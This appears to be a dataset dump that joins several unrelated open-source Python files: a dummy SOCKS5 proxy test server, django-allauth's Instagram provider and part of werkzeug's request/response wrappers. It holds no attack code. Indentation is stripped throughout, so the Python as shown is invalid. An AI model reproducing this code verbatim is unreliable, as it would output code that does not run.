ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
# Send authentication response
self.conn.sendall(bytearray([0x01, 0x00]))
# Read connect request
ver, cmd, _, atyp = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
# Send dummy response
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
logger.info('Proxy: %s', cmdin)
# Fall through to disconnect
except Exception as e:
logger.exception("socks5 request handling failed.")
self.serv.queue.put(e)
finally:
self.conn.close()
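# Illustrative sketch (not part of the original module): the bytes a client
# would send to drive Socks5Connection.handle() above through an
# unauthenticated CONNECT to "example.com" port 80 (per RFC 1928); the target
# host and port are made-up example values.
def _example_client_bytes():
    greeting = bytes([0x05, 0x01, 0x00])  # version 5, 1 method offered, no-auth
    request = (bytes([0x05, Command.CONNECT, 0x00, AddressType.DOMAINNAME, 11])
               + b"example.com" + bytes([0x00, 0x50]))  # port 80
    return greeting + request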
class Socks5Server():
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = queue.Queue() # report connections and exceptions to client
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
# connect to self to end run loop
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
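# Illustrative usage sketch (not part of the original module): starting and
# stopping the dummy proxy; the bind address is an assumed free local port.
def _example_server_usage():
    conf = Socks5Configuration()
    conf.addr = ("127.0.0.1", 19050)  # assumed free port
    conf.unauth = True
    conf.auth = True
    serv = Socks5Server(conf)
    serv.start()
    # ...point a SOCKS5 client at conf.addr; accepted commands and errors
    # are reported on serv.queue...
    serv.stop()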
| mit |
owais/django-allauth | allauth/socialaccount/providers/instagram/provider.py | 75 | 1150 | from allauth.socialaccount import providers
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class InstagramAccount(ProviderAccount):
PROFILE_URL = 'http://instagram.com/'
def get_profile_url(self):
return self.PROFILE_URL + self.account.extra_data.get('username')
def get_avatar_url(self):
return self.account.extra_data.get('profile_picture')
def to_str(self):
dflt = super(InstagramAccount, self).to_str()
return self.account.extra_data.get('username', dflt)
class InstagramProvider(OAuth2Provider):
id = 'instagram'
name = 'Instagram'
package = 'allauth.socialaccount.providers.instagram'
account_class = InstagramAccount
def extract_extra_data(self, data):
return data.get('data', {})
def get_default_scope(self):
return ['basic']
def extract_uid(self, data):
return str(data['data']['id'])
def extract_common_fields(self, data):
return dict(username=data['data'].get('username'))
providers.registry.register(InstagramProvider)
| mit |
codeworldprodigy/lab2 | lib/werkzeug/wrappers.py | 298 | 76131 | # -*- coding: utf-8 -*-
"""
werkzeug.wrappers
~~~~~~~~~~~~~~~~~
The wrappers are simple request and response objects which you can
subclass to do whatever you want them to do. The request object contains
the information transmitted by the client (webbrowser) and the response
object contains all the information sent back to the browser.
An important detail is that the request object is created with the WSGI
environ and will act as high-level proxy whereas the response object is an
actual WSGI application.
Like everything else in Werkzeug these objects will work correctly with
    unicode data. Incoming form data parsed by the request object will be
    decoded into a unicode object if possible and if it makes sense.
:copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
from datetime import datetime, timedelta
from werkzeug.http import HTTP_STATUS_CODES, \
parse_accept_header, parse_cache_control_header, parse_etags, \
parse_date, generate_etag, is_resource_modified, unquote_etag, \
quote_etag, parse_set_header, parse_authorization_header, \
parse_www_authenticate_header, remove_entity_headers, \
parse_options_header, dump_options_header, http_date, \
parse_if_range_header, parse_cookie, dump_cookie, \
parse_range_header, parse_content_range_header, dump_header
from werkzeug.urls import url_decode, iri_to_uri, url_join
from werkzeug.formparser import FormDataParser, default_stream_factory
from werkzeug.utils import cached_property, environ_property, \
header_property, get_content_type
from werkzeug.wsgi import get_current_url, get_host, \
ClosingIterator, get_input_stream, get_content_length
from werkzeug.datastructures import MultiDict, CombinedMultiDict, Headers, \
EnvironHeaders, ImmutableMultiDict, ImmutableTypeConversionDict, \
ImmutableList, MIMEAccept, CharsetAccept, LanguageAccept, \
ResponseCacheControl, RequestCacheControl, CallbackDict, \
ContentRange, iter_multi_items
from werkzeug._internal import _get_environ
from werkzeug._compat import to_bytes, string_types, text_type, \
integer_types, wsgi_decoding_dance, wsgi_get_bytes, \
to_unicode, to_native, BytesIO
def _run_wsgi_app(*args):
"""This function replaces itself to ensure that the test module is not
imported unless required. DO NOT USE!
"""
global _run_wsgi_app
from werkzeug.test import run_wsgi_app as _run_wsgi_app
return _run_wsgi_app(*args)
def _warn_if_string(iterable):
"""Helper for the response objects to check if the iterable returned
to the WSGI server is not a string.
"""
if isinstance(iterable, string_types):
from warnings import warn
warn(Warning('response iterable was set to a string. This appears '
'to work but means that the server will send the '
'data to the client char, by char. This is almost '
'never intended behavior, use response.data to assign '
'strings to the response object.'), stacklevel=2)
def _assert_not_shallow(request):
if request.shallow:
raise RuntimeError('A shallow request tried to consume '
'form data. If you really want to do '
'that, set `shallow` to False.')
def _iter_encoded(iterable, charset):
for item in iterable:
if isinstance(item, text_type):
yield item.encode(charset)
else:
yield item
class BaseRequest(object):
"""Very basic request object. This does not implement advanced stuff like
entity tag parsing or cache controls. The request object is created with
the WSGI environment as first argument and will add itself to the WSGI
environment as ``'werkzeug.request'`` unless it's created with
`populate_request` set to False.
There are a couple of mixins available that add additional functionality
    to the request object; there is also a class called `Request` which
subclasses `BaseRequest` and all the important mixins.
It's a good idea to create a custom subclass of the :class:`BaseRequest`
and add missing functionality either via mixins or direct implementation.
Here an example for such subclasses::
from werkzeug.wrappers import BaseRequest, ETagRequestMixin
class Request(BaseRequest, ETagRequestMixin):
pass
Request objects are **read only**. As of 0.5 modifications are not
allowed in any place. Unlike the lower level parsing functions the
request object will use immutable objects everywhere possible.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Per default the request object will be added to the WSGI
environment as `werkzeug.request` to support the debugging system.
If you don't want that, set `populate_request` to `False`.
    If `shallow` is `True` the environment is initialized as a shallow
    object around the environ. Every operation that would modify the
environ in any way (such as consuming form data) raises an exception
unless the `shallow` attribute is explicitly set to `False`. This
is useful for middlewares where you don't want to consume the form
data by accident. A shallow request is not populated to the WSGI
environment.
.. versionchanged:: 0.5
read-only mode was enforced by using immutables classes for all
data.
"""
#: the charset for the request, defaults to utf-8
charset = 'utf-8'
#: the error handling procedure for errors, defaults to 'replace'
encoding_errors = 'replace'
#: the maximum content length. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: parsing fails because more than the specified value is transmitted
#: a :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_content_length = None
#: the maximum form field size. This is forwarded to the form data
#: parsing function (:func:`parse_form_data`). When set and the
#: :attr:`form` or :attr:`files` attribute is accessed and the
#: data in memory for post data is longer than the specified value a
#: :exc:`~werkzeug.exceptions.RequestEntityTooLarge` exception is raised.
#:
#: Have a look at :ref:`dealing-with-request-data` for more details.
#:
#: .. versionadded:: 0.5
max_form_memory_size = None
#: the class to use for `args` and `form`. The default is an
#: :class:`~werkzeug.datastructures.ImmutableMultiDict` which supports
    #: multiple values per key. Alternatively it makes sense to use an
#: :class:`~werkzeug.datastructures.ImmutableOrderedMultiDict` which
#: preserves order or a :class:`~werkzeug.datastructures.ImmutableDict`
#: which is the fastest but only remembers the last key. It is also
#: possible to use mutable structures, but this is not recommended.
#:
#: .. versionadded:: 0.6
parameter_storage_class = ImmutableMultiDict
#: the type to be used for list values from the incoming WSGI environment.
#: By default an :class:`~werkzeug.datastructures.ImmutableList` is used
#: (for example for :attr:`access_list`).
#:
#: .. versionadded:: 0.6
list_storage_class = ImmutableList
#: the type to be used for dict values from the incoming WSGI environment.
#: By default an
#: :class:`~werkzeug.datastructures.ImmutableTypeConversionDict` is used
#: (for example for :attr:`cookies`).
#:
#: .. versionadded:: 0.6
dict_storage_class = ImmutableTypeConversionDict
#: The form data parser that shoud be used. Can be replaced to customize
#: the form date parsing.
form_data_parser_class = FormDataParser
#: Optionally a list of hosts that is trusted by this request. By default
#: all hosts are trusted which means that whatever the client sends the
#: host is will be accepted. This is the recommended setup as a webserver
#: should manually be set up to not route invalid hosts to the application.
#:
#: .. versionadded:: 0.9
trusted_hosts = None
    #: Indicates whether the data descriptor should be allowed to read and
#: buffer up the input stream. By default it's enabled.
#:
#: .. versionadded:: 0.9
disable_data_descriptor = False
def __init__(self, environ, populate_request=True, shallow=False):
self.environ = environ
if populate_request and not shallow:
self.environ['werkzeug.request'] = self
self.shallow = shallow
def __repr__(self):
# make sure the __repr__ even works if the request was created
# from an invalid WSGI environment. If we display the request
# in a debug session we don't want the repr to blow up.
args = []
try:
args.append("'%s'" % self.url)
args.append('[%s]' % self.method)
except Exception:
args.append('(invalid WSGI environ)')
return '<%s %s>' % (
self.__class__.__name__,
' '.join(args)
)
@property
def url_charset(self):
"""The charset that is assumed for URLs. Defaults to the value
of :attr:`charset`.
.. versionadded:: 0.6
"""
return self.charset
@classmethod
def from_values(cls, *args, **kwargs):
"""Create a new request object based on the values provided. If
        environ is given, missing values are filled from there. This method is
        useful for small scripts when you need to simulate a request from a URL.
        Do not use this method for unit testing; there is a full featured client
object (:class:`Client`) that allows to create multipart requests,
support for cookies etc.
This accepts the same options as the
:class:`~werkzeug.test.EnvironBuilder`.
.. versionchanged:: 0.5
This method now accepts the same arguments as
:class:`~werkzeug.test.EnvironBuilder`. Because of this the
`environ` parameter is now called `environ_overrides`.
:return: request object
"""
from werkzeug.test import EnvironBuilder
charset = kwargs.pop('charset', cls.charset)
builder = EnvironBuilder(*args, **kwargs)
try:
return builder.get_request(cls)
finally:
builder.close()
@classmethod
def application(cls, f):
"""Decorate a function as responder that accepts the request as first
argument. This works like the :func:`responder` decorator but the
function is passed the request object as first argument and the
request object will be closed automatically::
@Request.application
def my_wsgi_app(request):
return Response('Hello World!')
:param f: the WSGI callable to decorate
:return: a new WSGI callable
"""
#: return a callable that wraps the -2nd argument with the request
#: and calls the function with all the arguments up to that one and
#: the request. The return value is then called with the latest
#: two arguments. This makes it possible to use this decorator for
#: both methods and standalone WSGI functions.
def application(*args):
request = cls(args[-2])
with request:
return f(*args[:-2] + (request,))(*args[-2:])
return update_wrapper(application, f)
def _get_file_stream(self, total_content_length, content_type, filename=None,
content_length=None):
"""Called to get a stream for the file upload.
This must provide a file-like class with `read()`, `readline()`
and `seek()` methods that is both writeable and readable.
The default implementation returns a temporary file if the total
content length is higher than 500KB. Because many browsers do not
provide a content length for the files only the total content
length matters.
:param total_content_length: the total content length of all the
data in the request combined. This value
is guaranteed to be there.
:param content_type: the mimetype of the uploaded file.
:param filename: the filename of the uploaded file. May be `None`.
:param content_length: the length of this file. This value is usually
not provided because webbrowsers do not provide
this value.
"""
return default_stream_factory(total_content_length, content_type,
filename, content_length)
@property
def want_form_data_parsed(self):
"""Returns True if the request method carries content. As of
Werkzeug 0.9 this will be the case if a content type is transmitted.
.. versionadded:: 0.8
"""
return bool(self.environ.get('CONTENT_TYPE'))
def make_form_data_parser(self):
"""Creates the form data parser. Instanciates the
:attr:`form_data_parser_class` with some parameters.
.. versionadded:: 0.8
"""
return self.form_data_parser_class(self._get_file_stream,
self.charset,
self.encoding_errors,
self.max_form_memory_size,
self.max_content_length,
self.parameter_storage_class)
def _load_form_data(self):
"""Method used internally to retrieve submitted data. After calling
this sets `form` and `files` on the request object to multi dicts
filled with the incoming form data. As a matter of fact the input
stream will be empty afterwards. You can also call this method to
force the parsing of the form data.
.. versionadded:: 0.8
"""
# abort early if we have already consumed the stream
if 'form' in self.__dict__:
return
_assert_not_shallow(self)
if self.want_form_data_parsed:
content_type = self.environ.get('CONTENT_TYPE', '')
content_length = get_content_length(self.environ)
mimetype, options = parse_options_header(content_type)
parser = self.make_form_data_parser()
data = parser.parse(self._get_stream_for_parsing(),
mimetype, content_length, options)
else:
data = (self.stream, self.parameter_storage_class(),
self.parameter_storage_class())
# inject the values into the instance dict so that we bypass
# our cached_property non-data descriptor.
d = self.__dict__
d['stream'], d['form'], d['files'] = data
def _get_stream_for_parsing(self):
"""This is the same as accessing :attr:`stream` with the difference
that if it finds cached data from calling :meth:`get_data` first it
will create a new stream out of the cached data.
.. versionadded:: 0.9.3
"""
cached_data = getattr(self, '_cached_data', None)
if cached_data is not None:
return BytesIO(cached_data)
return self.stream
def close(self):
"""Closes associated resources of this request object. This
closes all file handles explicitly. You can also use the request
        object in a with statement which will automatically close it.
.. versionadded:: 0.9
"""
files = self.__dict__.get('files')
for key, value in iter_multi_items(files or ()):
value.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
self.close()
@cached_property
def stream(self):
"""The stream to read incoming data from. Unlike :attr:`input_stream`
        this stream is properly guarded so that you can't accidentally read past
the length of the input. Werkzeug will internally always refer to
this stream to read data which makes it possible to wrap this
object with a stream that does filtering.
.. versionchanged:: 0.9
This stream is now always available but might be consumed by the
form parser later on. Previously the stream was only set if no
parsing happened.
"""
_assert_not_shallow(self)
return get_input_stream(self.environ)
input_stream = environ_property('wsgi.input', 'The WSGI input stream.\n'
'In general it\'s a bad idea to use this one because you can easily '
'read past the boundary. Use the :attr:`stream` instead.')
@cached_property
def args(self):
"""The parsed URL parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
return url_decode(wsgi_get_bytes(self.environ.get('QUERY_STRING', '')),
self.url_charset, errors=self.encoding_errors,
cls=self.parameter_storage_class)
@cached_property
def data(self):
if self.disable_data_descriptor:
raise AttributeError('data descriptor is disabled')
# XXX: this should eventually be deprecated.
# We trigger form data parsing first which means that the descriptor
# will not cache the data that would otherwise be .form or .files
# data. This restores the behavior that was there in Werkzeug
# before 0.9. New code should use :meth:`get_data` explicitly as
# this will make behavior explicit.
return self.get_data(parse_form_data=True)
def get_data(self, cache=True, as_text=False, parse_form_data=False):
"""This reads the buffered incoming data from the client into one
bytestring. By default this is cached but that behavior can be
changed by setting `cache` to `False`.
Usually it's a bad idea to call this method without checking the
content length first as a client could send dozens of megabytes or more
to cause memory problems on the server.
Note that if the form data was already parsed this method will not
return anything as form data parsing does not cache the data like
this method does. To implicitly invoke form data parsing function
set `parse_form_data` to `True`. When this is done the return value
of this method will be an empty string if the form parser handles
the data. This generally is not necessary as if the whole data is
cached (which is the default) the form parser will used the cached
data to parse the form data. Please be generally aware of checking
the content length first in any case before calling this method
to avoid exhausting server memory.
If `as_text` is set to `True` the return value will be a decoded
unicode string.
.. versionadded:: 0.9
"""
rv = getattr(self, '_cached_data', None)
if rv is None:
if parse_form_data:
self._load_form_data()
rv = self.stream.read()
if cache:
self._cached_data = rv
if as_text:
rv = rv.decode(self.charset, self.encoding_errors)
return rv
@cached_property
def form(self):
"""The form parameters. By default an
:class:`~werkzeug.datastructures.ImmutableMultiDict`
is returned from this function. This can be changed by setting
:attr:`parameter_storage_class` to a different type. This might
be necessary if the order of the form data is important.
"""
self._load_form_data()
return self.form
@cached_property
def values(self):
"""Combined multi dict for :attr:`args` and :attr:`form`."""
args = []
for d in self.args, self.form:
if not isinstance(d, MultiDict):
d = MultiDict(d)
args.append(d)
return CombinedMultiDict(args)
@cached_property
def files(self):
""":class:`~werkzeug.datastructures.MultiDict` object containing
all uploaded files. Each key in :attr:`files` is the name from the
``<input type="file" name="">``. Each value in :attr:`files` is a
Werkzeug :class:`~werkzeug.datastructures.FileStorage` object.
Note that :attr:`files` will only contain data if the request method was
POST, PUT or PATCH and the ``<form>`` that posted to the request had
``enctype="multipart/form-data"``. It will be empty otherwise.
See the :class:`~werkzeug.datastructures.MultiDict` /
:class:`~werkzeug.datastructures.FileStorage` documentation for
more details about the used data structure.
"""
self._load_form_data()
return self.files
@cached_property
def cookies(self):
"""Read only access to the retrieved cookie values as dictionary."""
return parse_cookie(self.environ, self.charset,
self.encoding_errors,
cls=self.dict_storage_class)
@cached_property
def headers(self):
"""The headers from the WSGI environ as immutable
:class:`~werkzeug.datastructures.EnvironHeaders`.
"""
return EnvironHeaders(self.environ)
@cached_property
def path(self):
"""Requested path as unicode. This works a bit like the regular path
info in the WSGI environment but will always include a leading slash,
even if the URL root is accessed.
"""
raw_path = wsgi_decoding_dance(self.environ.get('PATH_INFO') or '',
self.charset, self.encoding_errors)
return '/' + raw_path.lstrip('/')
@cached_property
def full_path(self):
"""Requested path as unicode, including the query string."""
return self.path + u'?' + to_unicode(self.query_string, self.url_charset)
@cached_property
def script_root(self):
"""The root path of the script without the trailing slash."""
raw_path = wsgi_decoding_dance(self.environ.get('SCRIPT_NAME') or '',
self.charset, self.encoding_errors)
return raw_path.rstrip('/')
@cached_property
def url(self):
"""The reconstructed current URL"""
return get_current_url(self.environ,
trusted_hosts=self.trusted_hosts)
@cached_property
def base_url(self):
"""Like :attr:`url` but without the querystring"""
return get_current_url(self.environ, strip_querystring=True,
trusted_hosts=self.trusted_hosts)
@cached_property
def url_root(self):
"""The full URL root (with hostname), this is the application root."""
return get_current_url(self.environ, True,
trusted_hosts=self.trusted_hosts)
@cached_property
def host_url(self):
"""Just the host with scheme."""
return get_current_url(self.environ, host_only=True,
trusted_hosts=self.trusted_hosts)
@cached_property
def host(self):
"""Just the host including the port if available."""
return get_host(self.environ, trusted_hosts=self.trusted_hosts)
query_string = environ_property('QUERY_STRING', '', read_only=True,
load_func=wsgi_get_bytes, doc=
'''The URL parameters as raw bytestring.''')
method = environ_property('REQUEST_METHOD', 'GET', read_only=True, doc=
'''The transmission method. (For example ``'GET'`` or ``'POST'``).''')
@cached_property
def access_route(self):
"""If a forwarded header exists this is a list of all ip addresses
from the client ip to the last proxy server.
"""
if 'HTTP_X_FORWARDED_FOR' in self.environ:
addr = self.environ['HTTP_X_FORWARDED_FOR'].split(',')
return self.list_storage_class([x.strip() for x in addr])
elif 'REMOTE_ADDR' in self.environ:
return self.list_storage_class([self.environ['REMOTE_ADDR']])
return self.list_storage_class()
@property
def remote_addr(self):
"""The remote address of the client."""
return self.environ.get('REMOTE_ADDR')
remote_user = environ_property('REMOTE_USER', doc='''
If the server supports user authentication, and the script is
protected, this attribute contains the username the user has
authenticated as.''')
scheme = environ_property('wsgi.url_scheme', doc='''
URL scheme (http or https).
.. versionadded:: 0.7''')
is_xhr = property(lambda x: x.environ.get('HTTP_X_REQUESTED_WITH', '')
.lower() == 'xmlhttprequest', doc='''
True if the request was triggered via a JavaScript XMLHttpRequest.
This only works with libraries that support the `X-Requested-With`
header and set it to "XMLHttpRequest". Libraries that do that are
prototype, jQuery and Mochikit and probably some more.''')
is_secure = property(lambda x: x.environ['wsgi.url_scheme'] == 'https',
doc='`True` if the request is secure.')
is_multithread = environ_property('wsgi.multithread', doc='''
boolean that is `True` if the application is served by
a multithreaded WSGI server.''')
is_multiprocess = environ_property('wsgi.multiprocess', doc='''
boolean that is `True` if the application is served by
a WSGI server that spawns multiple processes.''')
is_run_once = environ_property('wsgi.run_once', doc='''
boolean that is `True` if the application will be executed only
once in a process lifetime. This is the case for CGI for example,
        but it's not guaranteed that the execution only happens one time.''')
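# Illustrative sketch (not part of the original module): building a request
# with the `from_values` helper documented above. It relies on werkzeug.test
# (shipped with Werkzeug); the URL and form values are made up.
def _example_request_usage():
    req = BaseRequest.from_values('/search?q=werkzeug', method='POST',
                                  data={'page': '2'})
    assert req.path == u'/search'
    assert req.args['q'] == u'werkzeug'
    assert req.form['page'] == u'2'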
class BaseResponse(object):
"""Base response class. The most important fact about a response object
is that it's a regular WSGI application. It's initialized with a couple
of response parameters (headers, body, status code etc.) and will start a
valid WSGI response when called with the environ and start response
callable.
Because it's a WSGI application itself processing usually ends before the
actual response is sent to the server. This helps debugging systems
because they can catch all the exceptions before responses are started.
Here a small example WSGI application that takes advantage of the
response objects::
from werkzeug.wrappers import BaseResponse as Response
def index():
return Response('Index page')
def application(environ, start_response):
path = environ.get('PATH_INFO') or '/'
if path == '/':
response = index()
else:
response = Response('Not Found', status=404)
return response(environ, start_response)
    Like :class:`BaseRequest`, this object lacks a lot of functionality, which
    is instead implemented in mixins. This gives you better control over the
    actual API of your response objects, so you can create subclasses and add custom
functionality. A full featured response object is available as
:class:`Response` which implements a couple of useful mixins.
To enforce a new type of already existing responses you can use the
:meth:`force_type` method. This is useful if you're working with different
    subclasses of response objects and you want to post-process them with a
    known interface.
Per default the request object will assume all the text data is `utf-8`
encoded. Please refer to `the unicode chapter <unicode.txt>`_ for more
details about customizing the behavior.
Response can be any kind of iterable or string. If it's a string it's
considered being an iterable with one item which is the string passed.
Headers can be a list of tuples or a
:class:`~werkzeug.datastructures.Headers` object.
Special note for `mimetype` and `content_type`: For most mime types
`mimetype` and `content_type` work the same, the difference affects
only 'text' mimetypes. If the mimetype passed with `mimetype` is a
mimetype starting with `text/`, the charset parameter of the response
object is appended to it. In contrast the `content_type` parameter is
always added as header unmodified.
.. versionchanged:: 0.5
the `direct_passthrough` parameter was added.
:param response: a string or response iterable.
:param status: a string with a status or an integer with the status code.
:param headers: a list of headers or a
:class:`~werkzeug.datastructures.Headers` object.
:param mimetype: the mimetype for the request. See notice above.
:param content_type: the content type for the request. See notice above.
:param direct_passthrough: if set to `True` :meth:`iter_encoded` is not
called before iteration which makes it
                               possible to pass special iterators through
unchanged (see :func:`wrap_file` for more
details.)
"""
#: the charset of the response.
charset = 'utf-8'
#: the default status if none is provided.
default_status = 200
#: the default mimetype if none is provided.
default_mimetype = 'text/plain'
#: if set to `False` accessing properties on the response object will
#: not try to consume the response iterator and convert it into a list.
#:
#: .. versionadded:: 0.6.2
#:
#: That attribute was previously called `implicit_seqence_conversion`.
#: (Notice the typo). If you did use this feature, you have to adapt
#: your code to the name change.
implicit_sequence_conversion = True
#: Should this response object correct the location header to be RFC
#: conformant? This is true by default.
#:
#: .. versionadded:: 0.8
autocorrect_location_header = True
#: Should this response object automatically set the content-length
#: header if possible? This is true by default.
#:
#: .. versionadded:: 0.8
automatically_set_content_length = True
def __init__(self, response=None, status=None, headers=None,
mimetype=None, content_type=None, direct_passthrough=False):
if isinstance(headers, Headers):
self.headers = headers
elif not headers:
self.headers = Headers()
else:
self.headers = Headers(headers)
if content_type is None:
if mimetype is None and 'content-type' not in self.headers:
mimetype = self.default_mimetype
if mimetype is not None:
mimetype = get_content_type(mimetype, self.charset)
content_type = mimetype
if content_type is not None:
self.headers['Content-Type'] = content_type
if status is None:
status = self.default_status
if isinstance(status, integer_types):
self.status_code = status
else:
self.status = status
self.direct_passthrough = direct_passthrough
self._on_close = []
# we set the response after the headers so that if a class changes
# the charset attribute, the data is set in the correct charset.
if response is None:
self.response = []
elif isinstance(response, (text_type, bytes, bytearray)):
self.set_data(response)
else:
self.response = response
def call_on_close(self, func):
"""Adds a function to the internal list of functions that should
be called as part of closing down the response. Since 0.7 this
function also returns the function that was passed so that this
can be used as a decorator.
.. versionadded:: 0.6
"""
self._on_close.append(func)
return func
def __repr__(self):
if self.is_sequence:
body_info = '%d bytes' % sum(map(len, self.iter_encoded()))
else:
body_info = self.is_streamed and 'streamed' or 'likely-streamed'
return '<%s %s [%s]>' % (
self.__class__.__name__,
body_info,
self.status
)
@classmethod
def force_type(cls, response, environ=None):
"""Enforce that the WSGI response is a response object of the current
type. Werkzeug will use the :class:`BaseResponse` internally in many
situations like the exceptions. If you call :meth:`get_response` on an
exception you will get back a regular :class:`BaseResponse` object, even
if you are using a custom subclass.
This method can enforce a given response type, and it will also
convert arbitrary WSGI callables into response objects if an environ
is provided::
# convert a Werkzeug response object into an instance of the
# MyResponseClass subclass.
response = MyResponseClass.force_type(response)
# convert any WSGI application into a response object
response = MyResponseClass.force_type(response, environ)
This is especially useful if you want to post-process responses in
the main dispatcher and use functionality provided by your subclass.
Keep in mind that this will modify response objects in place if
possible!
:param response: a response object or wsgi application.
:param environ: a WSGI environment object.
:return: a response object.
"""
if not isinstance(response, BaseResponse):
if environ is None:
raise TypeError('cannot convert WSGI application into '
'response objects without an environ')
response = BaseResponse(*_run_wsgi_app(response, environ))
response.__class__ = cls
return response
@classmethod
def from_app(cls, app, environ, buffered=False):
"""Create a new response object from an application output. This
works best if you pass it an application that returns a generator all
the time. Sometimes applications may use the `write()` callable
returned by the `start_response` function. This tries to resolve such
edge cases automatically. But if you don't get the expected output
you should set `buffered` to `True` which enforces buffering.
:param app: the WSGI application to execute.
:param environ: the WSGI environment to execute against.
:param buffered: set to `True` to enforce buffering.
:return: a response object.
"""
return cls(*_run_wsgi_app(app, environ, buffered))
def _get_status_code(self):
return self._status_code
def _set_status_code(self, code):
self._status_code = code
try:
self._status = '%d %s' % (code, HTTP_STATUS_CODES[code].upper())
except KeyError:
self._status = '%d UNKNOWN' % code
status_code = property(_get_status_code, _set_status_code,
doc='The HTTP Status code as number')
del _get_status_code, _set_status_code
def _get_status(self):
return self._status
def _set_status(self, value):
self._status = to_native(value)
try:
self._status_code = int(self._status.split(None, 1)[0])
except ValueError:
self._status_code = 0
self._status = '0 %s' % self._status
status = property(_get_status, _set_status, doc='The HTTP Status code')
del _get_status, _set_status
def get_data(self, as_text=False):
"""The string representation of the request body. Whenever you call
this property the request iterable is encoded and flattened. This
can lead to unwanted behavior if you stream big data.
This behavior can be disabled by setting
:attr:`implicit_sequence_conversion` to `False`.
If `as_text` is set to `True` the return value will be a decoded
unicode string.
.. versionadded:: 0.9
"""
self._ensure_sequence()
rv = b''.join(self.iter_encoded())
if as_text:
rv = rv.decode(self.charset)
return rv
def set_data(self, value):
"""Sets a new string as response. The value set must either by a
unicode or bytestring. If a unicode string is set it's encoded
automatically to the charset of the response (utf-8 by default).
.. versionadded:: 0.9
"""
# if an unicode string is set, it's encoded directly so that we
# can set the content length
if isinstance(value, text_type):
value = value.encode(self.charset)
else:
value = bytes(value)
self.response = [value]
if self.automatically_set_content_length:
self.headers['Content-Length'] = str(len(value))
data = property(get_data, set_data, doc='''
A descriptor that calls :meth:`get_data` and :meth:`set_data`. This
should not be used and will eventually get deprecated.
''')
def calculate_content_length(self):
"""Returns the content length if available or `None` otherwise."""
try:
self._ensure_sequence()
except RuntimeError:
return None
return sum(len(x) for x in self.response)
def _ensure_sequence(self, mutable=False):
"""This method can be called by methods that need a sequence. If
`mutable` is true, it will also ensure that the response sequence
is a standard Python list.
.. versionadded:: 0.6
"""
if self.is_sequence:
# if we need a mutable object, we ensure it's a list.
if mutable and not isinstance(self.response, list):
self.response = list(self.response)
return
if self.direct_passthrough:
raise RuntimeError('Attempted implicit sequence conversion '
'but the response object is in direct '
'passthrough mode.')
if not self.implicit_sequence_conversion:
raise RuntimeError('The response object required the iterable '
'to be a sequence, but the implicit '
'conversion was disabled. Call '
'make_sequence() yourself.')
self.make_sequence()
def make_sequence(self):
"""Converts the response iterator in a list. By default this happens
automatically if required. If `implicit_sequence_conversion` is
disabled, this method is not automatically called and some properties
might raise exceptions. This also encodes all the items.
.. versionadded:: 0.6
"""
if not self.is_sequence:
# if we consume an iterable we have to ensure that the close
# method of the iterable is called if available when we tear
# down the response
close = getattr(self.response, 'close', None)
self.response = list(self.iter_encoded())
if close is not None:
self.call_on_close(close)
def iter_encoded(self):
"""Iter the response encoded with the encoding of the response.
If the response object is invoked as WSGI application the return
value of this method is used as application iterator unless
:attr:`direct_passthrough` was activated.
"""
charset = self.charset
if __debug__:
_warn_if_string(self.response)
# Encode in a separate function so that self.response is fetched
# early. This allows us to wrap the response with the return
# value from get_app_iter or iter_encoded.
return _iter_encoded(self.response, self.charset)
def set_cookie(self, key, value='', max_age=None, expires=None,
path='/', domain=None, secure=None, httponly=False):
"""Sets a cookie. The parameters are the same as in the cookie `Morsel`
object in the Python standard library but it accepts unicode data, too.
:param key: the key (name) of the cookie to be set.
:param value: the value of the cookie.
:param max_age: should be a number of seconds, or `None` (default) if
the cookie should last only as long as the client's
browser session.
:param expires: should be a `datetime` object or UNIX timestamp.
:param domain: if you want to set a cross-domain cookie. For example,
``domain=".example.com"`` will set a cookie that is
readable by the domain ``www.example.com``,
``foo.example.com`` etc. Otherwise, a cookie will only
be readable by the domain that set it.
        :param path: limits the cookie to a given path, by default it will
span the whole domain.
"""
self.headers.add('Set-Cookie', dump_cookie(key, value, max_age,
expires, path, domain, secure, httponly,
self.charset))
def delete_cookie(self, key, path='/', domain=None):
"""Delete a cookie. Fails silently if key doesn't exist.
:param key: the key (name) of the cookie to be deleted.
